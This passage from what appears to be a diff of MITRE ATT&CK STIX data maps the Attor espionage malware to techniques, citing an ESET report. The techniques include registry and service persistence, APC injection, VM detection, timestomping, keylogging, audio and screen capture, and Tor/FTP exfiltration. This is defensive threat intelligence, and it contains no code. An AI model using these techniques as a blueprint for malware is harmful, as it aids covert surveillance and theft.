+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule rundll32.exe to load the dispatcher.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3c58b596-6a79-4c28-be76-40e7ae9afd8a",
+ "type": "relationship",
+ "modified": "2020-05-06T20:40:19.127Z",
+ "created": "2020-05-06T20:40:19.127Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can be executed as a service.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c05978ea-b814-473e-a073-9bae9ab7695b",
+ "type": "relationship",
+ "modified": "2020-05-06T20:40:19.172Z",
+ "created": "2020-05-06T20:40:19.172Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence via adding a Registry key with a logon script HKEY_CURRENT_USER\\Environment \"UserInitMprLogonScript\" .(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--29e33373-f05e-421b-9b5d-fc2d617b36af",
+ "type": "relationship",
+ "modified": "2020-05-06T20:40:19.179Z",
+ "created": "2020-05-06T20:40:19.179Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) can obtain application window titles and then determines which windows to perform Screen Capture on.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--0dfdfffc-2d1b-487f-91e0-66d81b185367",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.245Z",
+ "created": "2020-05-06T21:01:23.245Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule a new task that loads the dispatcher on boot/logon.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--98d32782-62e2-4cd7-90b1-78c8a062b6ed",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.423Z",
+ "created": "2020-05-06T21:01:23.423Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) can download additional plugins, updates and other files. (Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--57a19f3b-838f-45df-8cfe-964cbe5396d2",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.426Z",
+ "created": "2020-05-06T21:01:23.426Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has staged collected data in a central upload directory prior to exfiltration.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6376c6be-5ec7-4775-8984-13a1474dc92d",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.429Z",
+ "created": "2020-05-06T21:01:23.429Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I/O ports and using VM-specific instructions.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--270d73c2-27fb-43ac-80b9-d4ea3fef2c06",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.438Z",
+ "created": "2020-05-06T21:01:23.438Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has opened the registry and performed query searches.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fc661e81-fc5e-4243-874e-f311bc5a2d8d",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.444Z",
+ "created": "2020-05-06T21:01:23.444Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has encrypted data symmetrically using a randomly generated Blowfish (OFB) key which is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1e3a1ea2-55fb-4abc-970a-e384b4c7d314",
+ "type": "relationship",
+ "modified": "2020-05-14T20:55:00.175Z",
+ "created": "2020-05-06T21:01:23.447Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has used Tor for C2 communication.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--278b9898-50c6-4c6d-9a35-7079ed580e78",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.454Z",
+ "created": "2020-05-06T21:01:23.454Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can execute additional plugins by loading the respective DLLs.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--831513ed-bbf2-406f-ab74-bfffa8a376b7",
+ "type": "relationship",
+ "modified": "2020-05-14T20:43:41.551Z",
+ "created": "2020-05-06T21:01:23.459Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher has used CreateProcessW API for execution.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f0a78f8e-9d04-40d7-b0ce-6a463af4b8e1",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.463Z",
+ "created": "2020-05-06T21:01:23.463Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has exfiltrated data over the C2 channel.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7f7bf7a4-4f3a-48a6-bc19-4a139ba165a0",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.467Z",
+ "created": "2020-05-06T21:01:23.467Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) performs the injection by attaching its code into the APC queue using NtQueueApcThread API.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f5e7233b-6419-4c09-b95b-c43f3004f246",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.470Z",
+ "created": "2020-05-06T21:01:23.470Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has used FTP protocol for C2 communication.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--93f46e6e-cabc-4274-b50e-63bda692d01e",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.473Z",
+ "created": "2020-05-06T21:01:23.473Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has a file uploader plugin that automatically exfiltrates the collected data and log files to the C2 server.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f49a45b8-6efb-4ac5-8714-9dfd9b31edbd",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.477Z",
+ "created": "2020-05-06T21:01:23.477Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can modify the Run registry key.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6d39de5f-6fbd-43e3-8da8-03a4cbe46656",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.480Z",
+ "created": "2020-05-06T21:01:23.480Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can inject itself into running processes to gain higher privileges and to evade detection.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a308d350-2b2b-486a-a778-8e80f231dc68",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.483Z",
+ "created": "2020-05-06T21:01:23.483Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence by registering a new service.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--87c7f912-4093-44f2-9f18-e97e649dd52e",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.486Z",
+ "created": "2020-05-06T21:01:23.486Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has manipulated the time of last access to files and registry keys after they have been created or modified.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a2db7220-d784-485f-bc77-046b90c02daf",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.490Z",
+ "created": "2020-05-06T21:01:23.490Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "One of [Attor](https://attack.mitre.org/software/S0438)'s plugins can collect user credentials via capturing keystrokes and can capture keystrokes pressed within the window of the injected process.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a9ebd162-da0a-4582-ba63-6bb54e165730",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.493Z",
+ "created": "2020-05-06T21:01:23.493Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--40205b23-d3d0-4d6a-a739-7ba2eb061c4f",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.620Z",
+ "created": "2020-05-06T21:01:23.620Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) encrypts collected data with a custom implementation of Blowfish and RSA ciphers.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--07ab0a67-7c7b-4971-9a3e-45069f234800",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.624Z",
+ "created": "2020-05-06T21:01:23.624Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that is capable of recording audio using available input sound devices.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--eb5510f9-e2ec-4a57-9a96-93dc3028bcea",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.629Z",
+ "created": "2020-05-06T21:01:23.629Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "Strings in [Attor](https://attack.mitre.org/software/S0438)'s components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--895b238e-356f-4ad0-9a62-e6ae380dccd0",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.636Z",
+ "created": "2020-05-06T21:01:23.636Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that captures screenshots of the target applications.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
